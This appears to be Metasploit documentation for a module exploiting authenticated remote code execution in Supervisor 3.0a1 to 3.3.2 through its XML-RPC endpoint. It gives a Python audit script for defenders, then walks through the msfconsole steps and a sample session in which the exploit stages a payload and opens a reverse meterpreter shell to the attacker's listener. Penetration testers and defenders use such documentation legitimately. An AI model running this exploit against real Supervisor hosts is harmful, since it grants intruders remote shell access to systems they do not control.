metasploit-gs/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md
2017-08-30 03:10:46 +01:00


Vulnerable Application

This module exploits an authenticated RCE vulnerability in Supervisor versions 3.0a1 to 3.3.2.

This has been tested with versions 3.2.0 and 3.3.2.
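
For defenders inventorying hosts, the affected range above can be checked mechanically, including the pre-release lower bound (3.0a1), which a naive string comparison gets wrong. The following Python audit is an added example, not part of the Metasploit module or the original documentation. It assumes the standard supervisord.conf [inet_http_server] keys (port, username), and its sample hosts are constructed. A version match means the host needs review, since packaged builds inside the range may carry a backported fix.

```python
import configparser
import ipaddress
import re

AFFECTED = ("3.0a1", "3.3.2")            # inclusive range, as stated on this page
_STAGE = {"a": 0, "b": 1, "rc": 2}       # pre-releases sort below the final release

def version_key(text):
    """Map '3.0a1' or '3.3.2' to a tuple that sorts in release order."""
    m = re.fullmatch(r"(\d+(?:\.\d+)*)(?:(a|b|rc)(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised version: {text!r}")
    nums = [int(p) for p in m.group(1).split(".")]
    nums += [0] * (3 - len(nums))        # treat 3.0 as 3.0.0
    stage = (_STAGE[m.group(2)], int(m.group(3))) if m.group(2) else (3, 0)
    return tuple(nums), stage

def in_affected_range(version):
    return version_key(AFFECTED[0]) <= version_key(version) <= version_key(AFFECTED[1])

def is_loopback(host):
    try:
        return host == "localhost" or ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False                     # other hostnames: assume reachable

def audit(version, conf_text):
    """Return findings for one host's Supervisor version and supervisord.conf."""
    findings = ["version in affected range"] if in_affected_range(version) else []
    conf = configparser.RawConfigParser(inline_comment_prefixes=(";",))
    conf.read_string(conf_text)
    if conf.has_section("inet_http_server"):
        port = conf.get("inet_http_server", "port", fallback="")
        host = port.rpartition(":")[0]   # "9001", ":9001", "*:9001" bind all interfaces
        if host in ("", "*") or not is_loopback(host):
            findings.append(f"XML-RPC listener exposed on {port}")
        if not conf.get("inet_http_server", "username", fallback=""):
            findings.append("no HTTP basic auth configured")
    return findings

# Constructed sample inventory: (host, version, supervisord.conf contents)
SAMPLE = [
    ("app1", "3.2.0", "[inet_http_server]\nport = *:9001\n"),
    ("app2", "3.3.2", "[inet_http_server]\nport = 127.0.0.1:9001\nusername = user\npassword = 123\n"),
    ("app3", "3.3.3", "[unix_http_server]\nfile = /tmp/supervisor.sock\n"),
]

for name, version, conf in SAMPLE:
    print(name, audit(version, conf) or "ok")
```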

Verification Steps

  1. msf > use exploit/linux/http/supervisor_xmlrpc_exec
  2. msf > set lhost 192.168.0.2
  3. msf > set rhost 192.168.0.19
  4. msf > set httpusername user (optional)
  5. msf > set httppassword 123 (optional)
  6. msf > exploit
  7. A meterpreter session should have been opened successfully

Options

  • HttpUsername - Username for HTTP basic auth (optional)
  • HttpPassword - Password for HTTP basic auth (optional)
  • TARGETURI - The path to the XML-RPC endpoint

Scenarios

msf > use exploit/linux/http/supervisor_xmlrpc_exec 
msf exploit(supervisor_xmlrpc_exec) > set httpusername user
httpusername => user
msf exploit(supervisor_xmlrpc_exec) > set httppassword 123
httppassword => 123
msf exploit(supervisor_xmlrpc_exec) > set lhost 192.168.0.2
lhost => 192.168.0.2
msf exploit(supervisor_xmlrpc_exec) > set rhost 192.168.0.19
rhost => 192.168.0.19
msf exploit(supervisor_xmlrpc_exec) > check 

[*] Extracting version from web interface..
[*] Using basic auth (user:123)
[+] Vulnerable version found: 3.2.0
[*] 192.168.0.19:9001 The target appears to be vulnerable.
msf exploit(supervisor_xmlrpc_exec) > exploit 

[*] Started reverse TCP handler on 192.168.0.2:4444 
[*] Sending XML-RPC payload via POST to 192.168.0.19:9001/RPC2
[*] Using basic auth (user:123)
[*] Sending stage (2878872 bytes) to 192.168.0.19
[*] Command Stager progress - 100.00% done (782/782 bytes)
[+] Request timeout, usually indicates success. Passing to handler..
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.19:36186) at 2017-08-30 01:24:45 +0100

meterpreter >